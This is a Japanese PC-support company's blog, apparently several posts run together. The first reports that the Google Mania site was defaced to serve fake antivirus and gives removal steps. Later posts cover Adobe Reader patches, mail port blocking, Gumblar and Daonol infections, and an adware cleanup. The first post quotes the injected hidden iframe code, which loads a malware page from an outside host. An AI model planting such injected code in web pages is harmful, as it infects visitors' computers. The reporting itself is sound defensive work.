事の始まりはgoogleさんで調べ物をしてたどり着いたGoogle Maniaというサイト。
このサイトではgoogleの各種サービスについて詳しい解説などがされていて、この関係としては結構人気があると思われます。
検索でも最上位に表示されるような状況なので知っている方も多いかもしれません。

改竄されてしまったサイト(Google Mania)

ところがこのサイト長らくメンテナンス等されておらず放置状態となっています。
サイト自体も古いバージョンのCMSが利用されており既知の重大な脆弱性を持っているのですがメンテナンスされていない事もあって、悪意のある第3者によってサイトの改ざんが行われてしまっています。（ざっと確認しましたが全ページ改ざんされているようです）

6月頃に一度改ざんされて攻撃サイトと化してしまっていたようです(ソース)が、改ざんで埋め込まれたサイトが停止された事でいったんは落ち着いたようです。
（サイトメンテナンスによって改ざんされたわけではないようで、脆弱性はそのまま？）

今回2011年8月22日(今日)にアクセスしたわけですが、新しく改ざんされたかもしくは停止されたサイトが復帰したかの理由によりまたしても攻撃サイトと化しています。
しかも現時点(8月22日 17:00)でほとんどのセキュリティーソフトが検知できない新種の偽セキュリティソフトが勝手にPCにインストールされ実行されてしまうという状況なのです。

（改ざんされたサイト）
　Google Mania(ｇｏｏｇｌｅ－ｍａｎｉａ.ｎｅｔ)

（不正コード）
　<div style=”position: absolute; left: -1999px; top: -2999px;”><iframe src=”*ttp://kliemwrznr.co.**/i.php?go=1″ width=”3″ height=”3″></iframe></div>

（ウィルス検査結果）

＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝
VirSCAN.org Scanned Report :
Scanned time   : 2011/08/22 17:14:43 (JST)
Scanner results: 5% のアンチウイルスが(2/37) マルウェアと判定しました
File Name      : 0.2367670180808894.exe
File Size      : 936448 byte
File Type      : PE32 executable for MS Windows (GUI) Intel 80386 32-bit
MD5            : 22f95e63e1e109d894149c6b9949d59f
SHA1           : 5e1c325627988ebe86ea3dae280764334442104b
Online report  : http://r.virscan.org/173025f2d056d40ef7d8ff2442d76494

Scanner        Engine Ver      Sig Ver            Scan result
a-squared      5.1.0.3         20110822060411     -
AhnLab V3      2011.08.22.02   2011.08.22         -
AntiVir        8.2.6.32        7.11.13.155        -
Antiy          2.0.18          20110804.11725727  -
Arcavir        2011            201107140423       -
Authentium     5.1.1           201108211932       -
AVAST!         4.7.4           110821-1           Win32:FakeAlert-AZL [Trj]
AVG            8.5.850         271.1.1/3849       -
BitDefender    7.90123.8954708 7.38720            -
ClamAV         0.97.1          13462              -
Comodo         5.1             9829               -
CP Secure      1.3.0.5         2011.08.19         -
Dr.Web         5.0.2.3300      2011.08.22         -
F-Prot         4.6.2.117       20110822           -
F-Secure       7.02.73807      2011.08.22.01      -
Fortinet       4.2.257         13.567             -
GData          22.1742         20110822           -
ViRobot        20110820        2011.08.20         -
Ikarus         T3.1.32.20.0    2011.08.22.79150   -
JiangMin       13.0.900        2011.08.21         -
Kaspersky      5.5.10          2011.08.22         -
KingSoft       2009.2.5.15     2011.8.22.14       -
McAfee         5400.1158       6445               -
Microsoft      1.7604          2011.08.22         -
NOD32          3.0.21          6398               -
Norman         6.07.10         6.07.00            -
Panda          9.05.01         2011.08.21         -
Trend Micro    9.200-1012      8.360.11           -
Quick Heal     11.00           2011.08.20         -
Rising         20.0            23.71.03.03        -
Sophos         3.22.0          4.68               Mal/FakeAV-LX
Sunbelt        3.9.2497.2      10238              -
Symantec       1.3.0.24        20110821.003       -
nProtect       20110821.01     12475755           -
The Hacker     6.7.0.1         v00282             -
VBA32          3.12.16.4       20110821.1017      -
VirusBuster    5.3.0.4         14.0.179.0/5952350 -
＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝

検出できたものは「Win32:FakeAlert-AZL [Trj]」、「Mal/FakeAV-LX」として発見していますね。

偽セキュリティソフト(Security Protection)ですので自分を棚に上げて存在しないウィルスを大量に発見したかのように振る舞い
駆除するためにお金を払え(ソフトを購入しろ)という動作を行います。
攻撃手法の詳細は分かりませんが危険な状態ですね。

偽セキュリティソフト(Security Protection)

一度感染すると自分以外の常駐プログラムをどんどん強制終了させ、本物のセキュリティソフトも停止させられます。
また、偽セキュリティソフトを終了させようとタスクマネージャー等を立ち上げても強制終了させられてしまいます。
ということで一度動作し出すとシャットダウンするしかなくなります。
（偽セキュリティソフトが動いていますが意味がないですし、他の不正プログラムをネットから引っ張ってくる可能性もあります）

駆除は以下の方法で可能です。（幸い今回のケースは簡単でした）

1. 感染を確認したら即時ネットワーク接続を切断しパソコンをシャットダウンします。
   有線接続の場合はケーブルを抜き、無線接続の場合は電波をOFFにするかアクセスポイントの接続を切断します。
2. 再度電源を入れます。画面に何か表示されたらしばらくF8キーをトントン押し続けて下さい。
   詳細オプションの選択メニュー（またはWindows拡張オプションメニュー）が表示されます。
3. 「セーフモード」を選択してWindowsを起動します。
4. 偽セキュリティソフトの起動を停止
   スタート→すべてのプログラム→スタートアップ→に「Security Protection」という項目があるので
   マウスカーソルがこの上において 右クリック→削除
5. デスクトップのショートカットなどを削除
   デスクトップ上に「Security Protection」というショートカットがあるので削除。
   また、でたらめなファイル名アイコンがある場合はこれも削除（これが偽セキュリティソフトのインストーラーです）。
   

   偽セキュリティソフトのアイコン

6. 偽セキュリティソフト本体を削除

   WindowsVista、7の場合
   　　C:\Users\(ログイン名)\AppData\Roaming\defender.exe

   WindowsXP,2000の場合
   　　C:\Documents and Settings\All Users\Application Data\defender.exe

   が偽セキュリティソフト本体なのでこれを削除

7. 元の状態に戻す
   パソコンを再起動します。
   起動が終わったらネット接続を元に戻します（線を繋ぎ直す、または無線を再接続）。

以上です。
対象の箇所にファイルがない場合はファイル名でパソコン内を検索等してみて下さい。
（数日経てばほとんどのセキュリティソフトで対応できると思いますが。。。）

サイト管理者は自分のサイトに責任を持って管理していただきたいものですね。

昔のようにいわゆる危ないサイトにいかなければウィルスに感染しないという時代はとっくに終わっています。今回のようにウィルス対策ソフトのワクチンが間に合わない場合もありますが、それでも最低限の防御をしてより安全にインターネット等を楽しんでいただければと思います。

自信がない＆原因が違うなどの場合は是非弊社にお預けください！
他社には断られたような事案も大歓迎。お困りのことがあったら、お気軽にご連絡ください。お見積もりは無料です。

Tel：0268-75-8270
または
「お問い合わせ」
よりご連絡ください。

・Adobe Reader 9.3.4 以前、8.2.4以前
・Adobe Reader 9.3.4 以前、8.2.4以前

の全てのバージョンがアップデート対象となります。（バージョン7以下についてはすでにサポート外）

大変危険な問題を含む23件の脆弱性に対処しているそうです。

これまでもコンピューターウィルスに利用されたりするなどしており、大変危険な問題を解消するものですので対象製品をお使いの方はすぐにでもアップデートをするようにしてください。

まだ、日本語の案内ページはできていないようですが、
ソフトを立ち上げて「ヘルプ」メニューから「アップデートの有無をチェック」に進むと、最新バージョンへ更新できます。

これは、主にプロバイダが導入をしている「OP25B(Outbound Port 25 Blocking)」という仕組みによる原因であることが十中八九当てはまります。

ものすごく簡単いうと「迷惑メールを減らすための仕組み(詳しくはこちらを参照)」であるわけですが、これを実施すると、このれまでの設定ではご利用のプロバイダ以外のメールアドレスによるメールの送信ができなくなってしまいます。
個人の場合はメールアドレスはプロバイダのメールアドレスを使うことが多いため問題は発生しないのですが、企業やホームページをお持ちの方はこれとは違うメールアドレスを使っていることも多く、この場合は設定を変更しないとメールの送信ができなくなってしまうのです。

迷惑メールのためとはいえ不正利用を防止するために正しく利用している人に影響を与えるのはどうにかならないのでしょうかね。。。。

しかもこの切替はお客様曰く「何の連絡もなく突然こんなことされても困る」（無関係の私に言われても困るのですが…）という場合がほとんどで、お客様としては青天の霹靂だったということがものすごく多いのです。。。
さすがに大手のプロバイダなどは多分メールなり、郵便なりで事前に連絡しているとは思うのですがお客様には全く伝わっていないのですね。

ではどうやって送信できるように設定をし直すかということですが、これは各プロバイダのHPに案内がある場合がほとんど。プロバイダ毎に微妙に設定が違うことなどがあるので基本的にはご利用のプロバイダのHPを確認するか、電話でサポートを受けましょう。

サポートを受けてもわからない。やっぱり送信できない。などお困りの方は最後の手段として弊社にご相談ください。
お金はかかってしまいますが担当者がご自宅等に伺い設定を代行させていただきます。

最後に参考程度に弊社のレンタルサーバーをお使いの方向けに作成されている設定方法をリンクしておきます。
もしお使いのプロバイダがわからないとか、設定方法が見つからない場合は、こちらをご覧になって設定をしてみてください。（あくまで参考として）
・メールが受信できるのに送信できません

これにより現状のウィルスに関しては感染を防ぐことが可能となります（その他の攻撃先に脆弱性が残っている場合はそちらも対策しないといけませんが、すでに対策版がリリースされているのですぐに対応可能です）。

最新のバージョン9系(9.3)と一つ前の8系(8.2)アップデートが提供されています。
Adobe Reader や Adobe Acrobat をお使いの方は必ずアップデートを実施しましょう。

・Windows版
・Mac版
・Unix版

なお、7系以前についてはすでにサポート対象外となっているようですのでアップデートは提供されません。
古いバージョンをお使いの方は新しいものにアップグレードすることを強くお勧めします。

・JR東日本
・ホンダ
・ローソン
・モロゾフ
・信越放送

等々誰でもご存知の大手のサイトも次々感染しています。

感染したサイトにアクセスすると自動的にそのパソコンに感染してしまいます。
ウィルスに感染するとインターネットへのアクセスが監視され、パスワード情報等重要な情報が外部に送られてしまい、それを使って不正行為が行われるといった影響が発生します。

このウィルス被害者は多数に及ぶものと考えられますが 一番問題なのは「現時点で根本的な解決策がない」ことで、セキュリティーソフト等導入済みであっても、脆弱性のあるソフトウェアを最新にしても感染が防げないことが多い事でしょう。

このウィルスが感染する原因となるadobe acrobatやreaderなどのPDF閲覧ソフトやFlashプレーヤー(昨年12/9に提供された最新バージョン10.0.42.34 もしくは 9.0.260.0で対応しているそうです。puppetさん情報ありがとうございます)は近々修正版が提供される予定ですが、それまでは感染を防ぐことは難しいという状況ですので、インターネットをご利用の方はこの点を十分にご認識下さい。

既に感染してしまっているかどうかについては以下のサイトをご利用いただくことで確認出来ます。

トレンドマイクロ社　オンラインスキャン

また、セキュリティーソフトをご利用の方は最新版になっていることを確認後一度パソコン全体のスキャンを実施することをお勧めします。

(追記)
脆弱性を持つアプリケーションをご利用の場合でも、手動で設定変更することで感染を予防できます。以下のサイトに詳細な情報がありますので、気になる方は是非参考にしてみて下さい。

参考サイト：　べつになんでもないこと

具体的な症状としては

• パソコンを起動すると真っ黒な背景（またはログオンスクリーンの色）にマウスカーソルだけ表示される状態になる
• マウスカーソルはマウスで操作(移動)できるがクリック等しても何も起こらない
• セーフモードで起動しても同じ状態になることが多い

などの状態になります。

パソコンメーカーでも同様の症状によるサポート窓口への質問等が多発しているようで、窓口がパンク状態になっていることを公表しているところも多数ある状態です。

原因はパソコンウィルスの一つに感染してしまった事による症状です。
セキュリティー対策ベンダーでは「W32/Daonol」、「TROJ_DELF.WQD」、「Infostealer.Daonol」、「Lando」等と命名されるもので、半年ほど前に猛威をふるった「Gumblar」と同じセキュリティーホールを突いて進入を試みるタイプのトロイの木馬です。

このトロイの木馬はadobeのFlash Playerの脆弱性を利用しているためWindowsのアップデートだけでは対処出来ず、これにより被害が拡大しているものと思われます。
実際ウィルス対策ソフトを導入し、きちんと最新の状態で利用しているお客様のパソコンにも感染してしまった例を確認しております。

パソコンが正常に起動出来ないため一般の方には駆除が難しい事例でもあります。

上記のような症状が現れてしまった方は、弊社にて駆除及び対策等を実施させていただきますので、お気軽にご相談下さい。

トラブル発生

今回はとあるお客様より
「なんか変なホームページが勝手に開くようになっちゃってパソコンが異常に遅いんだけど…」
というご相談を受け対応させていただいた内容についてをご案内致します。

お客様より持込みでノートパソコンをお預かりした際に上記の症状をお聞きしたときに、アドウェアかワンクリウェアの類だろうと予想していましたが、結果はまさにその通りでした（いや、予想以上かもしれません）

パソコンを立ち上げると

• 難民等への寄付サイト等に勝手に繋がりデスクトップに表示される
• 一度消しても一定期間経過するとまた立ち上がる
• パソコンの動作が異常に遅い（起動に10分以上かかる）
• 勝手にインターネットにアクセスしようとする

などの症状が確認出来ました。
こういう時に大事なことはまずネットワークからパソコンを切り離すことです。
（有線の場合は線を外し、無線の場合は無線機器の電源を切ります）
ネットワークにパソコンを繋げたままにすると

• パソコンの情報を勝手にインターネット上にばらまく
• 迷惑メールの送信サーバーとして利用される
• 新しい不正プログラムがダウンロードされる
• 遠隔操作される

等の可能性があるためです。

こちらのお客様は残念ながらウィルス対策ソフトを導入されておりませんでしたので、
まずはウィルス・スパイウェアのチェックを実行してみました。

重症なパソコン

すると。。。。
こりゃすごい！　なんと150を超える様々な不正プログラムやウィルスが検出されるではありませんか！！

これまでいろいろなパソコンを見てきましたがここまで完膚無きまでにやられているパソコンにお目にかかったのは始めてです。当然パソコンが遅くなるのも納得ですね。

一体何をどうしてこうなってしまったのか。。。
ご本人に聞いても思い当たる節はないということで原因が分かりませんでした。
問題が1,2個のウィルスやスパイウェアだったら予想もつくのですがここまで被害が大きいと大元を捜すのはもはや不可能です。

原因探しはあきらめ、このパソコンをどうするかに焦点が移ります。

ここまで被害が大きいと２次的被害等も考慮して、クリーンインストールをし直す事が費用的にも時間的にもセキュリティー的にも良いと思われますが、使用中のソフトで既にインストールメディアが見つからず再インストールが出来ないものがいくつかあり、どうしても無くなっては困るということで、このパソコンから悪者を追っ払うという方法を選択する事になりました。

150以上の相手を倒すのは容易ではありません。しかも、ちまたではタチが悪いとされかかってしまったら修復はあきらめろとされている強敵もしっかりパソコン内に巣作っています。。。

ウィルス退治！

駆除作業は困難を極めます。。。

ウィルス対策ソフトも1つだけでは対抗できない（特にスパイウェアは検出漏れがどうしても発生する）ためいくつも利用しますが、それでも駆除等できないものもいくつもあります。このような場合はWindowsの内部を調べて不正なプロセスが動いていないか、また、レジストリ内等に勝手に起動させようとしているところは無いか等を調べたりと脳内がフル稼働です。
やっと作業が終了と思っても、どこからともなくゾンビのように復活する連中もいるので注意が必要です。

快適なパソコンライフ

何とか全ての悪者退治に成功し納品となりました。

今回の場合はパソコンのご利用者本人にはこうなった原因に全く心当たりがないということでしたので再発も十分考えられるため、セキュリティー対策ソフトを導入していただく事で再発防止をしていただく事になりました。

今回の作業で感じたことは

• バックアップをとっていれば感染前に戻せたかもしれない
• セキュリティー対策ソフトを導入していれば感染しなくて済んだかも知れない
• 利用ソフトのメディアをきちんと保管してあれば修復がもっと簡単にできたかもしれない

全て可能性の問題ではありますが、大抵の場合はこのうち1つでもあればより簡単で安く修理できたでしょう。

バックアップの設備等は導入にある程度費用はかかりますが、データ消失や故障などで発生する修理費用と比べれば微々たるものになる事の方が多いものです。
皆さんもいざというときに備えて是非、何らかの対策をご検討ください。

もし既に被害に遭われてしまっていた場合などはお気軽に弊社までお問い合わせ下さい。

セキュリティー対策ソフトといえば基本的に毎年維持費がかかる有料のソフトが多いのですが、今回マイクロソフトが無料で配布を開始しました。

これまで数ヶ月間ベータ版を使って様子見をしていましたが、動作もキビキビしていますし非常にパフォーマンスが良いと思います。
これより調子がよい（動作がより軽い）と思われるソフトは某有料のソフト1つくらいでしょうか。。。
大抵の他の有料製品を使うくらいなら私はこれを使いたいと思っています。

• セキュリティー対策ソフトに余計なお金を出したくない
• もっと動作の軽いソフトが使いたい
• 無料ソフトを使っているけど広告表示がうざい

等お悩みのある方は一度導入してみてはいかがでしょうか？

スタッフK一押しです！

導入手順について特設ページ（特設：MSEの導入）を開きましたのでご参照いただければきっと誰でも導入できます！

[Microsoftの深刻度分類 (重要度が高い順)]
・緊急 ← 今回の深刻度
・重要
・警告
・注意

[対象]
　クライアントOS
　　Windows2000,XP,Vista
　サーバーOS
　　Windows Server 2003,2008

[方法]
　Windows Update、Microsoft Update等